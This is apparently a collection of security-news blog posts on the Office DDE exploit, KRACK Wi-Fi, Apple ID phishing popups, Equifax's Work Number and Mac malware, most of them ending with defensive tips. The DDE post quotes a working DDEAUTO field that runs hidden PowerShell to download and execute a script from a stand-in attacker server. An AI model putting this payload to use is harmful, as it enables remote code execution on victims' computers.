Hackers Using Unpatched Microsoft Dynamic Data Exchange Exploit

There is a vulnerability present in Microsoft Office using it’s Dynamic Data Exchange (DDE) protocol. Exploiting it requires “no macros or, memory corruption”, and doesn’t show any security warnings (if correctly implemented) or raise flags with any antivirus software. There are thousands of applications that use DDE protocol, including MS Word and Excel.

DDE allows two running applications to share data, and can be set to do so either once, or whenever new data is becomes available. For example, one could use DDE to target a cell in Excel, and receive updates whenever that cell is edited. You can sync a cell in your own Excel doc with the cell in the original document.

The blog from Sensepost focused on using Microsoft Word and DDE to gain undetected access to command execution. The exploit is performed by editing an error message produced by adding a field to a Word doc. The error is edited to contain something like the following:

{DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe"  }

Or, you could do something worse than open the calculator, like this:

{ DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe -NoP -sta 
-NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString
('http://evilserver.ninja/pp.ps1');powershell -e $e "}

Basically, you tell Word to execute an automatically updating DDE field, and then you have the field execute command prompt, also calling your payload. In the proof of concept demonstration, they used a powershell command to launch an Empire stager as the payload.

Whenever the Word document is opened it will ask first for permission to allow the file to be updated by a linked file. If DDE is something you deal with, this would be nothing unusual. There is then a second prompt which is a security warning due to the DDE asking for access to command prompt, however, this can be hidden with “proper syntax modification” according to the blog. Then you just have to get the word file on the target system, and get the target to open the file, and click okay on the one prompt that pops up to allow the data to be shared. Boom, payload delivered.

Microsoft was sent this exploit, replicated it, and decided that it was a feature, so it will not be patched anytime soon. Microsoft has also released a Security Advisory in regards to various DDE related vulnerabilities, most involve the user changing settings to use Secure and Control Office. This requires the use of the Registry Editor, which if done incorrectly can break your computer, requiring you to reinstall your OS.

This vulnerability is now being exploited by cybercriminals and state-sponsored hackers. Notably, it has been utilized by the hacking group “Fancy Bear” which is believed to be affiliated with the Russian government. They have been using a spearphishing campaign around the New York terror attack in recent weeks to bait users into clicking on the malicious documents, infecting their system with malware. It has also been used against several organizations and companies in various forms.

Since it is a Microsoft process, nothing will stop DDE from running whatever is sent through it. One way to protect yourself is by disabling DDE entirely on your machines. You can also use Microsoft’s recommendation using the Registry Editor to secure Office, or you could go into the settings for some of the apps that use DDE and disable automatic updating or receiving updates from other DDE applications. As always, don’t click links or download files from emails unless you are certain that the source is safe.

 

Daniel Szafran

 

Article Sources:

Macro-less Code Exec in MSWord    – (contains demo and proof of concept for exploit)

Russian ‘Fancy Bear’ Hackers Using (Unpatched) Microsoft Office DDE Exploit

Microsoft Security Advisory 4053440

Advertisements

Encryption system used to exploit protected Wifi networks

Everyone knows that they could be a potential target for cyber-crime; as it often appears in the news almost every day. But just how vulnerable is an individual? CERT recently made a statement about how your Wifi network could be exploited if proper precautions are not taken.

On October 16th, 2017, the Computer Emergency Readiness Team made an announcement that addresses the protection of your sensitive information. In short, its advice is to update all your devices when security advancements are available. The reason for this is that a widely used encryption system used on wireless networks can lead to a breach of your credit card information, emails, passwords, etc.

Essentially, the system allows a hacker to gain access to the internet traffic that occurs between computers. Once in, the hacker can manipulate the data that is recovered. Depending on the target’s network configurations, it is even possible for the attacker to inject malware into the network. The unsettling part about this encryption system is that it has the capability of effecting a very wide range of devices including Android, Apple, Linux, and Windows.

Companies such as Intel, Microsoft, Google, and Apple have heeded this advice and have released updates that will help protect people with their devices from this issue.

– Jared Albert

 

Phishing for Apple ID passwords on iOS

It has recently been discovered that legitimate dialogue boxes that prompt the user for their password to log into their Apple ID can be easily replicated with frightening similarity. Felix Kraus, an iOS developer for Fastlane.Tools posted the proof of concept on his blog in an effort to get this “loophole which has been around for many years” closed. The fake boxes are nearly identical to the legitimate ones.

apple-id-phishing-attack

As you can see, they are nearly indistinguishable from one another. Unless you’re looking for it, you would never be able to distinguish between the two. Even if you were thinking it might be a phishing attack, it would be nearly impossible to determine with certainty whether it was legitimate or not. This particular box type has the user email associated with the Apple account in it, but there is also a version without the email address.

apple-id-phishing-attacks

Again, if you weren’t expecting this to be a phishing attack, you would probably not think twice before inputting your password.

The boxes are created, quite easily, through the Apple Developer tool UIAlertController. The exact methods for creating these boxes were not disclosed by Krause for security purposes, but a quick look at the UIAlertController on Apple’s developer page shows that creating the box is as easy as following a template.

 

Thankfully, Krause also offered several tips to avoid being phished in this manner:

If you press the home button and the app and dialogue boxes both close, then it was a phishing attack. If the app and dialogue are still up then it is legitimate. This is because system dialogues are handled with a different protocol than app dialogues.

Don’t even begin to enter your credentials into a popup. Even if you don’t submit the form, they probably have recorded your inputs. Go into the settings app and enter them there.

 

If the user has 2 factor authentication enabled they’ll be safer from phishing attacks of this nature. That said, if the app also asks for the 2 Factor Authentication token and the user puts it in, then they’ve nullified the whole process.

As always, be careful when you’re putting in your credentials. You never know where phishing attacks will come from next.

 

– Daniel Szafran

 

Felix Kraus blog: https://krausefx.com/blog/ios-privacy-stealpassword-easily-get-the-users-apple-id-password-just-by-asking

Source Article: https://thehackernews.com/2017/10/apple-id-password-hacking.html

Apple Developer UIAlertController:  https://developer.apple.com/documentation/uikit/uialertcontroller

Equifax: The Work Number

Everyone has heard about the Equifax security breach that had compromised an unknown number of Americans. but not everyone has heard about another of Equifax’s services: The Work Number

Screen Shot 2017-10-09 at 8.03.01 AM

The Work Number is a service that provides an individual’s detailed salary and employment history. It was designed to provide automated employment and income verification to employers. It can also provide proof of income should someone be applying for a loan.

With such a large database of private information and the above image the first thing you see when going to: www.theworknumber.com/Employees you would expect a large number of security protocols defending it. Initially, yes, but after the recent Equifax breach, maybe not so much.

To access he information requires one to input their employer’s code, which would be easy to look up if the Equifax system wasn’t down for maintenance. Then it asks for a “User ID” which in most cases it your SSN or a portion of it. Finally it asks for your “PIN” which is defaulted to be some variation of your Date of Birth (mm/dd/yyyy or yyyy/mm/dd). After gaining access is does require you to change the PIN and set up half a dozen security questions for verification. Then it allows you to access any of your income or employer history on its database.

The troubling thing about this is that in the Equifax security breach some of the major pieces of information stolen was DOB and SSN, allowing someone to access your information as long as they could learn who your current employer is, in order to get the employer code. After they gain access to the Work Number, a potential hacker can change your PIN and set up security questions and lock you out of the whole system.

-Spencer Mycek

source: Krebsonsecurity

The Hard Apple: Why It’s Difficult to Acquire Malware on a Mac

It always seems like there is a new virus, new malware, new adware, that happens to pop up on a computer running Windows. But why do we not here about this happening on a Mac? The answer is hidden under the operating system, tracing it to it’s roots, along with the attacker’s target audience.

Apple Mac computers are a Unix based operating system. Unix is normally a very secure operating system with their own built in features. Along with this, Apple has added its own type of security features along with this. One of these features is called Gatekeeper. Gatekeeper blocks any software than hasn’t been digitally signed and approved by Apple. A second feature  used by Mac’s is known as the act of Sandboxing. The process involves the checking of applications to confirm that they are only doing what they’re supposed to be doing. Sandboxing also isolates the applications from system components and other parts of the computer that do not have anything to do with the app’s initial designed purpose. The final security that is used by Apple is called FileVault2, which is a simple file management system that encrypts all of the files on the Mac computers. These embedded securities created by Apple help to create a more secure system for their users.

Normally, it would be thought that Mac users would be an easy group to target, but based on recent data, it is seen by most attackers that the amount of people present in the Apple community is not worth the overall effort of making a virus or malware that can be successful for passing through all of the Apple security obstacles. The reason why there are very limited viruses/malware for Mac devices, is because the attackers have a greater and easier target audience for Windows users.

Regardless of the very few amount of Mac related viruses and malware, there have still been instances of them occurring. In just 2017, there has been a 230% increase in Mac malware. An example of this is the OSX/Dok malware. OSX/Dok occurred in April 2017 and was a trojan that would hijack all incoming and outgoing traffic with the Mac computer. The trojan was signed with a valid certificate from Apple, meaning that the hackers could have used a legitimate developers account to initialize this attack. Another attack that took place in February of 2017 was called MacDownloader. This adware would display to a user as a free update for the Adobe Flash Player. When the installer ran, the program would prompt the user that there is adware on the Mac and would prompt for the system password. This would then begin the process of transmitting data (ie. usernames, passwords, etc.) to a remote server. The final example of successful Mac malware would be one called Safari-Get. Happening in November of 2016, this was a type of social engineering that involved sending out links through emails and the link either opening multiple iTunes windows, or multiple draft emails (just depending on the Mac operating system version). This would cause the system to freeze or cause a memory overload and force a shutdown.

Regardless of the lack of effort put forth by attackers towards Mac users, there still should be some safety concern for users. This can be made easily by updating applications and being careful when clicking links or even opening certain files.

-Ryan Keihm

Sources

Do Macs get viruses, and do Macs need antivirus software?

16 Apple Security Advances to Take Note of in 2016